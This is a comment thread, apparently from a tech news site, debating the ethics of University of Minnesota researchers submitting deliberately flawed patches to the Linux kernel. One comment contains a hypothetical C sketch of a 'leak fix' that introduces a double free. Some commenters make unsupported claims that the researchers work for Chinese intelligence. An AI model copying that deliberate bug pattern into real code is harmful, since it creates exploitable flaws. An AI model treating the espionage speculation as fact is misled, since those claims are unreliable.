Place your bets...
that this was a CCP sponsored/encouraged attempt at "supply chain" code repository compromise?
Computer scientists at the University of Minnesota theorized they could sneak vulnerabilities into open-source software – but when they tried subverting the Linux kernel, it backfired spectacularly. And now their entire school – or at least anyone using a umn.edu email address – has been banned from offering future Linux …
Still, one should question whether the policy of "Don't probe possible vulnerabilities because it might upset us" is such a great idea in today's infosec targeting world.
As noted in the story, making automatic assumptions about code quality based purely on source location or personal accreditation leaves the channel open to possible hacking (cough, SolarWinds and Git, cough).
In today's aggressive world we need better. A lot better. Probing vulnerabilities is what white hats do. That's their job. Whinging about the fact that they had the nerve to target *you* doesn't fix your potential vulnerabilities.
I think that comment is missing the point.
"Still, one should question whether the policy of "Don't probe possible vulnerabilities because it might upset us" is such a great idea in today's infosec security targeting world."
Probing vulnerabilities in the code is important, and the Linux community doesn't have a problem with people doing that. Nor is there a problem looking at the ways people operate and suggesting that such ways lead to security problems. The key is that observation of others is good and probing of your own systems running others' code is good. Probing others' systems without permission is a very different story.
Consider a parallel. Penetration testing is important to ensure that security procedures are sufficient and followed. Hiring a penetration tester is a good idea. However, penetration-testing someone who didn't agree to it is not. At best, you have people angry at you even though you've demonstrated problems worth fixing. At worst, you end up in jail. If these researchers had gained the agreement of someone in authority on the team that they would run the experiment, the community would probably be reacting very differently. They didn't even try to get permission.
Except it was not a medical science experiment, and Linux kernel patches don't make people sick, so dial down the grandstanding. For a start, Linux developers don't take the Hippocratic oath.
If you replace anybody's words by your own, then yes, you can decide arbitrarily that anybody is a monster. It doesn't make you right.
Indeed. However, the Hippocratic oath is a popular misconception. It exists almost entirely in the imagination of Hollywood screenplays, along with throwing motherboards in the air. Doctors and medical staff are bound by laws that long ago transcended the fanciful notions of the classical Greek scholar.
In Germany you become a doctor (of medicine) when the members of your review board shake your hand and welcome you as a colleague - and the state then issues your license. There is no oath. You are bound by our constitution.
Yes, I should get out more, but where else can I apply my ability to Google stuff?
"... you are confusing machines with people. Bugs in code are not equal to bugs in people."
But isn't one of the bones of contention here that the ethics board and/or the researchers appeared to have made the mistake of confusing people with machines? If the aim was to see whether the Linux development process could be subverted, then the subjects under test here would actually be the community of developers, rather than the Linux kernel as such (i.e. people, not machines).
Like all experiments involving human subjects, any serious ethical approval process should have subjected this proposal to a much more rigorous assessment, especially given the absence of consent (as well as the significant risk of high-profile reputational damage). There are more ethical ways of conducting this kind of research (cf. penetration testing). If I had been on the ethics approval panel in question, I would have insisted on major changes to the approach, with safeguards for the experimental subjects, before even considering the possibility of approval.
[The connection with medical research is that that was where ethical considerations were first taken seriously, so it is natural to use medical analogies when discussing research ethics.]
As someone who sits on a university ethics committee, it would not surprise me if the majority of the ethics committee involved didn't really understand the implications of the research project they were reviewing. It's likely to be made up of predominantly social science and humanities staff whose specialist areas are a long way from this. Two worlds and all that. Yet another reason why we need computing staff to engage willingly with the ethics process to the extent of actually joining the committees.
This post has been deleted by its author
A social experiment, yes, but a needless one. We already know that malicious code can be sneaked into projects; it has happened, and is sometimes detected in time.
The experiment proves nothing, causes extra work for the volunteer maintainers of Linux, and basically says, "My PhD 'research' is more important than your open source project". The IRB should be ashamed of themselves for allowing this. The first question they should have asked is, "Is what you would learn worth the deliberate disruption of a volunteer organization?" The answer in this case is a resounding "No!"
It's worth remembering that this "Volunteer organisation" is maintaining code used to run the server (and other) infrastructure of many of the largest corporations and government departments in the world. It's also likely used in most of the hardware providing internet and network connectivity to those companies and consumers. It's important that good security practices are used, and that those practices are tested.
It's not good enough to only accept submissions from certain email domains. You don't know if the servers running email on those domains have been compromised in any way. You might think you are getting good code from john.smith@ibm.com, but john.smith@ibm.com might be some hacker from some country that has a major grievance with you.
Is this experiment ethical? I don't know. It's certainly not good for the people conducting the experiment to offend the test subjects.
However, I think the reaction is over the top and slightly concerning. Yes, the changes introduced were relatively harmless, so the maintainers probably do feel their time was wasted. However, one or more of the changes could have been malicious. Checking code for security reasons is, IMO, never a waste of time even if you find no security issues.
> It's not good enough to only accept submissions from certain email domains
The Linux Kernel isn't doing that.
> However, I think the reaction is over the top and slightly concerning
The reaction - banning the entire institution - is actually one of the "fixes" mooted in the researchers' own paper - only taking commits from trusted institutions.
> Checking code for security reasons is, IMO, never a waste of time even if you find no security issues.
I agree. On the other hand, this research wasted time that could have been spent catching other, actually malicious, commits.
Wasted time? OK, but at most it's a few hours of people's time. Irrespective of the research itself, the exposure that this has had, and the increased awareness it has generated, is out of all proportion - in a positive sense - to any time wasted. The commenter in the original story was right: this is an emotional, rather childish reaction to a real issue that should be addressed. Yes, we would all be annoyed and feel a bit of a tool in this situation. But that is not a professional or effective way to deal with it. As usual at the Reg, because it concerns the Linux kernel, tribal loyalty means a fair proportion of readers immediately decided it's a terrible thing to do.
This is the world's most used software, anything that highlights or even suggests the potential for security issues is a good thing. This is especially true here given the very trivial negative consequences arising from the study. If people can't accept that, I would question whether tribal feelings aren't perhaps clouding their objectivity.
If you really think only "a few hours of people's time [were wasted]", I suggest you "waste" your own time and read into what actually happened. This is a nice starting point:
https://lore.kernel.org/linux-nfs/YH/8jcoC1ffuksrf@kroah.com/
They submitted a number of patches, and each of them had to be re-reviewed not just for their validity when they were each submitted, but their validity compared to the current state of the code, where patches to the patched code or other bits that utilize the code must also be reviewed. Some of their commits fixed legitimate bugs while introducing others, so the parts that were fixed need to be retained while the parts that introduced new bugs or no new functionality at all need to be culled. It is not a simple process due to the complexity of the kernel.
There is also the case of the attitude of the two students, which was... let's say less than humble. They did not approach this situation in a way that was constructive for all parties. Aditya accused Greg of slander when he did not trust the students' latest patchset, since they had submitted bogus patches immediately prior; patches that they knew were bogus, since they based their entire paper around them.
Perhaps you don't know how much real effort goes into the review processes around the Linux kernel. But in either case, their behavior was unwelcome to the community, potentially destructive since some of their patches made it to stable branches, and overall not helpful to the broader issue. As shown, it did nothing but create more work for the maintainers and hold up legitimate patches and releases from being reviewed.
My main takeaway here is not that security is bad, or that auditing is bad, or that redteaming is bad. The problem is that they attempted to audit something we essentially already know is vulnerable: manual, human-reviewed patches. And it's an open mailing list; they could have just analyzed existing patches that were found to be bad, instead of this ploy. The situation could be a lot better for submitting patches to the kernel, but it's the way the big hitters are used to and it does still work. Until someone comes up with a better method with more automated safeguards and checks in place, the human element will still be a big factor in deciding what does and doesn't go into the kernel.
> Wasted time? OK, but at most it's a few hours of people's time
I see you've not looked into what actually happened then. It was more than a few hours of people's time.
> this is an emotional, rather childish reaction to a real issue that should be addressed.
I'll say it again - the action that was taken was *exactly* the action suggested by the researchers in their own paper.
They recommended a course of action to improve things, and after one of the students accused Greg K-H of slander (because he criticised one of their bunk patches), he followed their recommendations.
> As usual at the Reg, because it concerns the Linux kernel, tribal loyalty means a fair proportion of readers immediately decided it's a terrible thing to do.
Or, an alternative view, is that it's nothing to do with the Reg, and in fact your views on the way the kernel handles things just don't tally with the majority. There are a lot of things the kernel team don't handle particularly well - this isn't one of them IMO.
> This is especially true here given the very trivial negative consequences arising from the study.
Ok, and what about the *next* study? If this behaviour is deemed ethical/acceptable it follows that there will be a next one.
Not to mention, of course, that all this happened after the study, yet bunk patches were still being submitted. It's in the mail thread linked in the article. The paper was up, the deed was (in effect) done, and then the students started submitting bunk patches again.
I don't think the disagreement is a matter of objectivity, in your case it might be that you've skim-read a single source and missed some fairly key points.
An Institutional Review Board typically has a very narrow scope: that of preventing "unethical" experiments on students or unnecessary access to their records. This research project would have fallen outside that scope. It is true that the students have now suffered the consequences ...
While I fully understand that a social experiment needs the 'target' to be unaware of said experiment to prove the point, I would certainly agree that there are a lot of ethical conundrums here. The researchers probably targeted the Linux kernel because it is used in so many places and by that virtue is a sensitive project, and also because it has a lot of traffic and as such, small changes that could introduce problems can potentially slip by under the radar.
But that said, there's a distinct ethical problem here... because the project relies on volunteers who are passionate about their work, wasting their time is in itself technically unethical. I would certainly question the ethics panel at UMN and how they came to their conclusions.
If they wanted to do this right they should have informed the leadership and got permission, then placed the code somewhere that the community could review it and see if anyone caught the flaws. They did not!
We did a similar experiment here at my work. We did a phishing email experiment. Leadership and all of IT were aware but the user community was not. It was a success and pissed off no one.
I agree with the OP in this thread. These individuals should be thoroughly investigated for ties to the CCP.
This does not pass the smell test.
I also agree with the reaction. Emotional? Sure! But if there is no pain for the University then their oversight will not get any better. If it were me, I'd ban them from committing anything to the OSS community for 10 years. Try recruiting Computer Science students and faculty when they know none of their work can be contributed to the OSS community. This is the problem with US Universities: there is a consistent record of bad behavior, shoddy research, corrupt wasting of the people's money, trampling on the rights of students and faculty (yes, a minority, but...) and there are almost never any consequences!
> and reacting emotionally
On the contrary, Kroah-Hartman's initial response was engagement, and the story did not leap straight to the ban. As the rather more detailed ZDNet article says:
'You might think that these graduate students might get the hint. They didn't. One of the researchers, Aditya Pakki, doubled down. Pakki sent Kroah-Hartman a message stating, "I respectfully ask you to cease and desist from making wild accusations that are bordering on slander." He also claimed these patches were the result of a new static analyzer he'd written. Pakki closed, "I will not be sending any more patches due to the attitude that is not only unwelcome but also intimidating to newbies and non-experts." Kroah-Hartman had had enough. He replied:'
and THEN banned the Uni, as the ethics committee refused to intervene.
See https://www.zdnet.com/article/greg-kroah-hartman-bans-university-of-minnesota-from-linux-development-for-deliberately-buggy-patches/
"and THEN banned the Uni, as the ethics committee refused to intervene."
When the department finally issued a statement it was the most anodyne they could have got away with. An apology at this stage would have been appropriate pending the results of an investigation.
White Hats ask permission before they test - typically high up so advance knowledge doesn't change the results, and also because it avoids pesky things like charges under the Computer Misuse Act.
If they do NOT ask permission, their targets are justified to take their claims to be "WHITE" hat after they've been caught with a liberal helping of salt, and so may the courts if it gets that far. Or would you believe a burglar you caught in your house to be "just testing your security free of charge, guv"?
That's a naive statement. It's possible to get quiet co-operation for these sorts of activities if the approach is right. It happens all the time in corporate environments.
This was lazy unethical behaviour - I suspect because they couldn't be bothered to get co-operation or were frightened of being told no.
It works all the time. If you're going to penetration test someone who asked for it, you coordinate with the person who hired you that you're going to do it. You don't tell them all the details, but they need to know who you are and at least a range of time you might do the penetration. That's so that, if you fail to penetrate and end up in the security office or the police station, they know to vouch for you.
These researchers didn't "get caught", rather they published a paper. Over the years they have published a lot of good and valuable papers and submitted many patches to fix real kernel bugs and otherwise improve the kernel. See for yourself: https://lkml.org/lkml/2021/4/21/454. (Maintainers replying to these proposed reverts are pretty much all saying "don't revert it, it's a good patch" or "it does no harm".)
It is clear that these guys are not bad guys. They have done good things for Linux, and they were in the process of trying to do another good thing when they made a mistake. Why has an angry mob now set out to destroy the careers of these good people? Surely we are smarter than that.
Just read that thread and a few others; actually, a lot of their other patches were rejected as invalid (there were an awful lot of them). It wasted a lot of time for a lot of people, and the patches weren't described as coming from a static analysis tool, which is part of the problem. I think Greg KH is right on this one.
"a lot of their other patches were rejected as invalid"
I have read the thread, have you? "A lot" is simply wrong. I saw one where they followed the api documentation to the letter. The documentation says:
* If this function returns an error, kobject_put() must be called to
* properly clean up the memory associated with the object. This is the
* same type of error handling after a call to kobject_add() and kobject
* lifetime rules are the same here.
so they submitted a patch to change a kfree to a kobject_put as the documentation directs. The patch was reviewed and accepted. In this case, the documentation was wrong.
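For anyone who hasn't been near the kobject API, here's a rough sketch of the error-path pattern the documentation describes. Illustrative only, not the actual UMN patch; struct foo, foo_register and friends are made-up names:

/* Illustrative sketch, not the real patch: the kobject documentation
 * says that once kobject_init_and_add() has been called, a failure
 * must be cleaned up with kobject_put() (which fires the ktype's
 * release callback) rather than a bare kfree(). */
#include <linux/kobject.h>
#include <linux/slab.h>

struct foo {
	struct kobject kobj;
	/* ... */
};

static void foo_release(struct kobject *kobj)
{
	kfree(container_of(kobj, struct foo, kobj));
}

static struct kobj_type foo_ktype = {
	.release = foo_release,
};

static int foo_register(struct kobject *parent)
{
	struct foo *f = kzalloc(sizeof(*f), GFP_KERNEL);
	int ret;

	if (!f)
		return -ENOMEM;

	ret = kobject_init_and_add(&f->kobj, &foo_ktype, parent, "foo");
	if (ret)
		/* The documented rule: kobject_put(), not kfree(f).
		 * The disputed patch made exactly this kind of swap. */
		kobject_put(&f->kobj);

	return ret;
}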
There are precious few others. The count might be up as high as two by now. Against this there are a lot (objectively true) of real bug fixes where maintainers either NACKed the revert or said they would just have to do the fix over again if it was reverted.
They got caught after they published a paper. It is akin to criminals getting caught after bragging about their crimes.
I can accept that their intentions were not malicious, however they willingly, knowingly and without authorization introduced security vulnerabilities into the Linux kernel, which is computer crime by any definition. How can one be sure that an organized crime group or a government organization did not subvert their efforts to stealthily introduce vulnerabilities into the Linux kernel (there is no doubt that they were doing exactly that) to use it for nefarious purposes? How can we be sure that their work was not secretly sponsored, e.g. by the NSA?
As an example, what if someone works for a bank and decides to test the bank's security systems by moving some of the money into a personal account without telling anyone? What if there are several "bankers" working together to get this job done? And then they publish their "findings" online? Would anyone in the world be surprised if their "careers" were ruined as a result even if no money was spent and they claimed they were planning to return everything?
It is up to the researchers now to prove they were not guilty, but IMHO they were rightly banned and shamed to discourage any such practices. The uni knew about it and approved it, so it was rightly banned too.
I disagree with "They got caught after they published a paper."
The article suggests that the paper itself tells how they contacted maintainers to assure malign patches didn't make it into the kernel. In other words, they admitted to their actions prior to publishing the paper.
Which also means that this misstates what happened: "they willingly, knowingly and without authorization introduced security vulnerabilities". Technically they tested whether they could, but withdrew the changes prior to commit.
"what if someone works for a bank and decides to test the bank's security systems by moving some of the money into a personal account without telling anyone" is a flawed analogy. A better comparison would be a developer at the bank creating software that could do that, with the permission of their manager. Prior to the code going live they would reveal and remove that code and initiate a review of code validation and data security practices as their actions should have been spotted prior to their admission.
Which is something I've almost done. I just worked it as a theoretical exercise rather than writing the malicious code, which also meant I didn't need managerial approval and could get the necessary process changes without ever putting the systems at risk. But I knew the existing process (and information security practices and controls) from the inside.
For something like the linux kernel it's insufficient to sit externally going, "I could do that" and far more effective to demonstrate by doing it.
"It is clear that these guys are not bad guys."
It's far from clear that these guys are not bad guys. It's very clear that anything they've contributed is not to be trusted which is why Greg K-H has been put to the trouble of stripping it all out.
And what, now, is going to be the value of a University of Minnesota CS degree after the department has trashed its reputation?
"It is clear that these guys are not bad guys."
Is it? One of the longest-used tactics of espionage is to infiltrate and act as a good and decent citizen up to the point of fulfilling your mission, i.e. the 9/11 terrorists.
If their careers are destroyed, no one did that but them!
>Still, one should question whether the policy of "Don't probe possible vulnerabilities because it might upset us" is such a great idea in today's infosec targeting world.
Nope, that's "Don't try a supply chain attack on unsuspecting victims because it is a criminal offence and you will go to jail to spend time with other criminals". These guys are lucky to get away so easily, I can only assume they did not make it up and their stupidity was natural.
I am more worried about this part though:
>>Katie Moussouris, CEO of Luta Security, voiced a similar opinion, calling the response an "emotional overreaction" and arguing that the findings have value from a national security perspective.
If various governmental agencies conclude that the Linux kernel is a "fair game" / valid target "from a national security perspective" we will all have a hard time.
>> If various governmental agencies conclude that the Linux kernel is a "fair game" / valid target "from a national security perspective" we will all have a hard time.
Surely, you are not that naive? If various government agencies are NOT targeting Linux/GNU, then they are not doing their jobs.
Sorry, but that's a naive thing to say. This is what the NSA's (and various other unnamed acronym agencies across the world) job *is*. I have to agree with Katie on the view that this *is* a national security issue, and it *is* important to make sure this doesn't happen.
*HOW* this was done (i.e. the research) and executed is highly questionable.
>> If various governmental agencies conclude that the Linux kernel is a "fair game" / valid target "from a national security perspective" we will all have a hard time.
>Surely, you are not that naive? If various government agencies are NOT targeting Linux/GNU, then they are not doing their jobs.
Surely there are various dynamically updated catalogues of Linux 0-days in various government agencies and they can always approach specialists when they need to hack high-profile Linux targets.
What I mean, is that to the best of my knowledge no state actor tried to execute a concerted supply chain attack on the Linux kernel. A successful attack could allow for targeted or mass snooping or sabotage on a worldwide scale but when discovered, it would be easier than usual to trace the instigator and the backlash would be colossal.
No state actor is likely to admit executing a concerted supply chain attack on the Linux kernel. Even if they did pull something off, it'd probably look like the Heartbleed bug in OpenSSL; it is certainly not going to be submitted by bugInsertAttempt@nsa.gov
I mean, you do realise that these are entities that produce perfectly plausible covers for people when they want them, complete with totally legitimate credit cards, passports etc as a matter of course? No online only community has a hope of totally preventing infiltration by government because all of a sudden with nation state level resources things in the security landscape that you thought were certainties may become uncertain without warning.
All of the subjects in the subject line know how to get around domain-name and IP restrictions. That's a pretty bad way to enforce security of the jewels.
Many researchers have run afoul of authorities when they probed some product. Witness Randal Schwartz, who exposed security vulnerabilities at Intel and was prosecuted.
It's the corporate PHBs who are the most dangerous to security. They want profits over competence.
Lots of people are hanging their argument on a false choice: that punishing the uni that approved this amounts to denying that researchers should be able to look at the process as well as the code when it comes to kernel security.
Yeah, developers can try to make submissions that get around the crude email block. That should be your first clue this was a political move to punish the Uni for screwing up. That doesn't mean the actual reviewers aren't also doing additional screening. They are, and were before, now they just have one more dumb line on the checklist.
Before the Uni approved this, they should have checked with the kernel team to see if there was an established process for this, and respected the team's wishes by not launching an attempt to subvert the process without a green light from the higher-ups. That doesn't mean the kernel team should or can block all such research, or that the Uni couldn't publish their concerns or how the process is handled.
Instead the Uni clearly has its own process issues to address, as their "don't give them a chance to say no" process has predictably left them wearing their own ass for a hat.
I suspect that ban might get rolled back if they publish and stick to some reasonable guidelines for campus-sanctioned research. We'll see, I guess, once steam stops shooting from Linus' ears.
One last point worth raising: the kernel team's response should probably treat Uni researchers the same regardless of their nationality. Do we really want them setting a precedent that Unis in China, Iran, and Russia can attempt unauthorized penetrations without sanctions? Or, out of all of the possibilities, is maybe expecting a Uni-level organization to get prior consent not such a bad option?
I'm unhappy about this for several reasons:
1. The university's apparent belief that research can only be unethical if it involves human subjects is just plain wrong. This university isn't the only one that has this opinion (I have first-hand experience of several British universities), but it needs to be nuked from orbit.
2. The "we're open source so our time is more valuable than anyone else" attitude is really quite poor. It looks as if there is a "trust but don't verify" system going on, which this research has shown up.
3. As mentioned by several commentards so far, banning on the basis of email domain is just security theatre, which leads back to point 2 above.
@Intractable Potsherd
" The "we're open source so our time is more valuable than anyone else" attitude is really quite poor."
Or maybe it's that it's open source and a lot of people are working on this in their "spare" time, e.g. they have another job and work on open source for reasons such as general coding enjoyment, helping the community, etc, etc.
Yes, I know some open source coders do get financial support - but not many.
"Yes, I know some open source coders do get financial support - but not many."
Don't confuse number of contributors with number of contributions, at least as far as the Linux kernel is concerned. There are regular reports on who writes the Linux kernel. The top contributors in terms of actual material contributed are corporate.
>2. The "we're open source so our time is more valuable than anyone else" attitude is really quite poor. It looks as if there is a "trust but don't verify" system going on, which this research has shown up.
Nope, that's just "we are not paid to clean up your mess".
By publishing the details of the contributions (and thus dates), they have effectively given evidence of maleficence, thus any corporation who had downtime could essentially have a field day.
Hell, any dodgy corporation that didn't have downtime could simply fire off a threatening letter in the hopes of a quiet settlement.
The "we're open source so our time is more valuable than anyone else" attitude simply comes from the fact that a lot of this time is people doing the work on a volunteer basis, without any payment.
Just to give a more real-world metaphor, can you imagine what would happen if you went into a soup kitchen and said "I've peed in one of the stews you're about to feed to people - but don't worry, nobody will ever eat it because I've just told you about it, it's just a scientific experiment to test for a vulnerability in your processes"?
Point 3 leads back to point 1, it's not security theatre in that sense, it is blocking explicitly the organisation whose processes are flawed.
I do have some sympathy for the IRB, they are generally there for looking at human research (animal research too in the places that do it), which is very important. It may simply not have occurred to them this was something that needed oversight (which brings us back to point 1, because the institution as a whole must realise there is a need for ethics beyond the medical faculty).
> "The university's apparent belief that research can only be unethical if it involves human subjects is just plain wrong. "
I think it's the apparent belief that is wrong. The University will know that things other than human subject research can be unethical. In fact, in this case, the problem is likely that they hadn't worked out that it was effectively human subject research. My guess is they read "tool and method for discovering security flaws".
If they had read, "we will see if people can detect our attempt to deceive them", then the panel would have said no.
"If they have read, "we will see if people can detect our attempt to deceive them", then the panel would have said no."
I think it is part of a job well done to go further than what is written in bold on the front page. After all, even people who have no mischief in mind can describe things in a confusing way.
The university's apparent belief that research can only be unethical if it involves human subjects is just plain wrong.
That appearance is what's "just plain wrong". HSR (human-subjects research) is only one of the concerns of the IRB at any accredited US university. I haven't read the paper to find the authors' verbatim statement about IRB review, but it sounds like they don't understand it either.
They may have misled the IRB; the IRB panel at Minnesota which reviewed this project may not have been very good. But IRBs are not solely concerned with HSR.
I've read the replies to my post, and I agree with some of them (and upvoted accordingly). I don't completely agree with the defences of the response, but I can see the thought-processes behind the defences and can see that they are well-meaning.
However, far too little opprobrium is being focused on the ethics board. With the importance of IT in today's world, projects should be scrutinised as hard as medical research. There should be a mixture of expert and lay people on the committees to give everything a really solid review and power to recommend change or not give approval. Publication of results should be dependent on ethics approval having been given as we are (slowly) getting to in medical research. This is an opportunity to learn.
I suspect the domain name and IP restrictions are really making a point loudly. The people involved in maintaining the project know this isn't so much a block as a way of annoying and making the university aware that they overstepped the mark. Otherwise I imagine they would give a half hearted apology and then carry on as if nothing had happened.
Blocking the Uni was not about security! That can be addressed in another form. What it was about is putting some pain on them for approving an absolutely stupid idea! Make them think about and improve their review process. It boggles the mind that none of these "over-educated shitheads" thought this was a bad idea!
I want to avoid using the names of the participants to draw any such conclusions (i.e. that the CCP was behind the research); however, open source projects and Linux itself have MANY potential "enemies", i.e. people with something to lose when it is successful, and so do the people and governments that make use of Linux (and open source software) in one form or another, including what is probably more than HALF of cell phone users.
Now that this "experiment" has happened, and it has NECESSARILY BACKFIRED, eyes are open and precautions WILL be taken.
I just hope that it does NOT make free (as in freedom) software LESS FREE in the process.
Guilt by association? Because figuring out actual guilt is just too time-consuming and bothersome. The result is actually less security, because it takes the easy way. Perhaps they are just a bit arrogant, daft, and under-educated about actual security pentesting procedure.
Did you know there is no shortage of master race members who have sold out to the CCP for cash?
This post has been deleted by its author
It'll be fun watching you spend hours trying to get a locksmith out to fix your locks. Then, when they eventually arrive, jump out of the bushes and shout "Surprise! I was only testing your door locking procedures!" and you can then carry on as normal, with a smile on your face, having wasted hours of your life trying to sort something out that was completely unnecessary ...
This post has been deleted by its author
>I'll quality control the locks to your house next time you're car isn't in the drive
Go for it....
Seriously, has nobody here ever had to work with a competent QA department? Those characters spend their entire lives devising ways to break my creations and they don't always play fair. They seem to derive a lot of pleasure from seeing how quickly they can break a new release.
Despite the professional enmity this sort of negative behavior engenders, I recognize it as an essential part of development. I respect them even as I hate them (and off duty we're actually friends....).
If the researchers informed the maintainers after the email and before it even became a commit then what was learned? If they wanted to see if such a patch would be accepted then you would think they would let the kernel review process happen, let it get past some level of scrutiny and then stop it at a late stage.
Yes, this would be far more annoying, but at least it would actually probe if the project would catch the malicious code. Perhaps I misunderstood the article?
They wasted the time of every maintainer who read their submission. And since a very large number of patches have to be rolled back, clearly "the patches never got into the code base" is an inaccurate statement. Moreover, some of the suspect patches have had subsequent patches made on top of them, which makes rollback even more onerous.
The IRB at UMN screwed up. The experiment was aimed at human systems. This wasn't a probe at some toolchain; it was an attempt to see if people could be manipulated into approving the injection of subtle bugs that turned immature (not exploitable) issues into exploitable use-after-free bugs. "The project" isn't some black box, some machine; it's people. Manipulation of humans requires full review, not a waiver, and it required affirmative permission from the most senior person(s) involved in Linux kernel change approval.
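To make the use-after-free point concrete, here's a minimal, purely hypothetical userspace sketch (not one of the actual UMN patches; struct conn, handle_msg and the rest are invented for illustration) of how an innocent-looking "leak fix" can hand the caller a freed pointer:

#include <stdlib.h>
#include <string.h>

struct conn {
	char *buf;
};

/* Before: on a bad message we bail out early and leave buf alone.
 * The buffer is only released by the caller's normal teardown, so the
 * worst case is a short-lived leak - untidy, but not exploitable. */
static int handle_msg(struct conn *c, const char *msg)
{
	if (msg[0] != 'A')
		return -1;
	strncpy(c->buf, msg, 63);
	return 0;
}

/* After a plausible-looking "fix the leak" patch: the error path now
 * frees the buffer, but the caller still owns and later frees c->buf,
 * so the same pointer ends up freed twice (or used after free).
 * The leak really is fixed; the new bug is the subtle part. */
static int handle_msg_patched(struct conn *c, const char *msg)
{
	if (msg[0] != 'A') {
		free(c->buf);
		return -1;
	}
	strncpy(c->buf, msg, 63);
	return 0;
}

int main(void)
{
	struct conn c = { .buf = calloc(1, 64) };

	handle_msg(&c, "A ok");          /* fine */
	handle_msg_patched(&c, "bogus"); /* error path frees c.buf */
	free(c.buf);                     /* normal teardown: double free; the allocator will typically abort here */
	return 0;
}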
"since a very large number of patches have to be rolled back..."
Doesn't look like that: https://lkml.org/lkml/2021/4/21/454
Maintainers are mostly NACKing the proposed reverts, or stating that no harm is done.
What is true: a large number of patches need to be reviewed. But that was always true, and arguably review has gotten slack lately. Howls of protest over the simple proof of that isn't going to fix it.
By that logic, I could say it would be OK to test life support systems by unplugging patients from them to see the effects, and that it would still be acceptable as long as you plug the patient back in in time. Otherwise how can you be sure it really helps the patients? Or actually lighting a controlled fire in a crowded place to check how fast people can evacuate the building.
https://en.wikipedia.org/wiki/Institutional_review_board is worth the check.
As the article noted:
"The paper describes how the authors submitted what's described as subtly subversive code contributions that would introduce error conditions into the operating system software, and it claims the researchers subsequently contacted Linux maintainers to prevent any bad code ending up in an official release of the kernel.
"It further states that the experiment was vetted by the university's Institutional Review Board (IRB), which determined that the project did not constitute human research and thus granted an ethical review waiver."
That's an awful lot of files for things which never made it into the kernel, apparently. Which makes me wonder if, by reverting anything from U of M, they are actually just getting rid of legitimate stuff, because the research stuff never made it in. I looked at a few of them, and they don't look either malicious or no-ops. So I am puzzled.
> what will happen is that all the stuff from U of M will get ripped out, and then from that stuff other people will consider what's valuable, what's not, and re-submit the good stuff
And - just to make your point really clear - UofM lose the credit for those changes and can't brag about them in their IT course prospectuses etc.
Bragging about this in their prospectus wouldn't look too good anyway. Admitting it would be ethical - it would tell the candidates to look elsewhere if they don't want the University's reputation hung around their necks when they graduate. But it seems their motto is "Any way but Ethics".
I think they have concluded that, as the uni is a bad-faith actor, they now need to double-check everything in case they missed something the first time round. In light of the actions of the researchers they can't be certain of the boundaries that were set, or that nothing had been done previously. A bit belt-and-braces, but in reality in IT security all anyone can say is "I have not found an intruder / backdoor etc" - there is no guarantee that there isn't one.
> pointed to Kroah-Hartman's remarks about rejecting future contributions from University of Minnesota email addresses and argued that making trust decisions on the basis of email domains rather than confirmed code correctness is a more noteworthy problem.
Mister Valsorda doesn't understand the ban at all: just because somebody isn't banned doesn't mean their patches won't go through peer review before the merge.
What happened, is that UM proved themselves to be wholly untrustworthy, both on the "experiments on humans", and "keeping researchers from doing unethical experiments" fronts.
The easiest way to subvert software is to go to the distribution or more low profile infrastructure. Ethics are of course a very serious obstacle, but what about a (large) local government with a massive national security apparatus. They send your company a "request" to do XYZ to code UVW distributed to ABC. They do this in the form of a national security letter containing a non-disclosure clause.
Now you have several choices: a) you blab publicly and go 10..25 years to jail, or b) you refuse to cooperate and the national security threat database suddenly includes your company and you personally, or c) you reluctantly do as you are told.
Some choice, don't you think?
Even better. Massively undercut your target org's outsourced support costs, then take the sloppy Network Admin approach: install a network management tool like Kaseya that has a local agent on each box, deploy the management server off-site / in a different hosting setup, then push whatever malicious MSI packages you like, when you like.
The only secure way to monitor your network is not to install active monitoring agents on it, and instead just push / ingest logs to a SIEM server.
If you install agents on your endpoints and servers that are two way, you're increasing your attack surface.
There are many passive ways to watch your network.
Nope, I don't think there was an overreaction at all.
I think it is justified to ban the Uni as they proved to be untrustworthy.
And that will be a lesson to others. Play fair, submit good code, and all will be well.
But if you do submit code in order to undermine the stability of a system, out you go, as you're clearly not trustworthy, and every single bit of code you've submitted will be subject to scrutiny or, better still, termination and removal from the system.
Which makes me wonder - closed source, how safe is it? What will happen if somebody on the inside deliberately injects some code for a backdoor or create some unstable condition, will this be detected and removed? What exactly will happen in this sort of scenario?
The closed source code for Windows XP and Windows Server 2003 was leaked online in September 2020 (well, at least enough to razzle-dazzle it: "tools/razzle.cmd"). So you could analyze that for possible backdoor code, but the reality is that there are enough accidental bugs that deliberately adding backdoors would just be overkill.
The systemd-cancer is not a part of the kernel, it's just another init.
I've clearly spent too long in some parts where they speak a bit of a variant of the Queen's English, so initially my not quite yet awake brain picked that up as "The systemd-cancer is not a part of the kernel, it's just another, innit?"
Yes, coffee. Definitely need more coffee.
:)
These two are either some of the biggest idiots the academic world has ever seen, or they are pen-testing the Linux Kernel Project on behalf of Chinese intelligence services.[*]
Is being a completely irresponsible moron now a requirement for tenure in US Computer Science Uni Departments?
-----
[*] No, it's not as far-fetched as you might think it is.
That makes no sense.
I assume the Chinese intelligence services would rather not publish their findings if that were the case. Just get the bugs in, and carry on exploiting them later. They would definitely not publish their findings in a journal.
> They would definitely not publish their findings in a journal.
How confident are you in the use of the adverb definitely in this particular case?
You need to think that through a bit more. Hint: it has to look like legit "academic research".
On a related train of thought: I was counting down the time before someone would post a denial / justification / rationalization. One hour, that's how long it took.
Lame.
Funny, I was also waiting for someone to blow that particular horn. It was bound to happen, for reasons that must be clear to you, considering you're the one who did it.
And you can keep your contempt and hints and whatever else makes you sleep well and comfortably smug at night. Yet, a mess such as the one we are witnessing would not be sponsored by any intelligence agency: too noisy, self-defeating as an intrusion mechanism, AND wakes up your enemy. Lose, lose, lose.
I do not follow the mantra of "not attributing to malice...", but it is apt in this case.
Now, if you have a (war) drum to bang, and reason need not apply, do carry on.
> Yet, a mess such as the one we are witnessing would not be sponsored by any intelligence agency: too noisy, self-defeating as an intrusion mechanism, AND wakes up your enemy.
Tell me you're not trying this tired bullshit again, are you?
"It couldn't have been the Chinese, because if it were, they wouldn't get caught."
What enemy? The Linux Kernel enemy?
Is this the best whoever pays you could come up with?
Ask your boss for a new script.
Cue: "What about NSA and Cisco?" Now is the time. Go for it.
It may very well be that the CCP instigated the idea to do the testing, but not for the reason you would think. Since the destruction of Huawei by the US administration, I think the realisation in China about using Open Source as a protection mechanism for preventing these things from happening has grown a lot. It may have wanted to see how difficult it would be to make such subversions in the code base, and what the effects would be. The massive number of attack vectors in proprietary software and users means there is hardly any need to insert vulnerabilities into Linux.
